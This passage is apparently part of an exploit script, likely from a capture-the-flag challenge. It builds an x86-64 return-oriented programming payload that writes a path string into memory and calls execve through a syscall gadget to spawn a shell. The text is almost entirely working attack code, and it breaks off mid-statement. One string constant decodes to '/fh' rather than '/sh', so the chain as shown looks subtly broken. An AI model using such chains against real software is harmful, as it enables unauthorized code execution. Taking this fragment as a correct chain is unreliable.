payload = p64(0x40727b)
#0x40727b: pop rax ; retf
payload += p64(0x449070)+p32(0x4344bd)+p32(0x33)
# 0x00000000004344bd: xchg edx, eax; ret 0; 
payload += p64(0x40727b)
# 0x40727b: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x441f42)+p32(0x33)
# 0x0000000000441f42: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x40727b)
# 0x40727b: pop rax ; retf
payload += p64(0x449074)+p32(0x4344bd)+p32(0x33)
# 0x00000000004344bd: xchg edx, eax; ret 0; 
payload += p64(0x40727b)
# 0x40727b: pop rax ; retf
payload += p64(0x68662f)+p32(0x441f42)+p32(0x33)
# 0x0000000000441f42: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x40727b)
# 0x40727b: pop rax ; retf
payload += p64(0x0)+p32(0x4344bd)+p32(0x33)
# 0x00000000004344bd: xchg edx, eax; ret 0; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x449070)+p64(0x40727b)
# 0x40727b: pop rax ; retf
payload += p64(0x3b)+p32(0x4017d1)+p32(0x33)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40f8fb)
# 0x000000000040f8fb: syscall; ret; 
payload +=
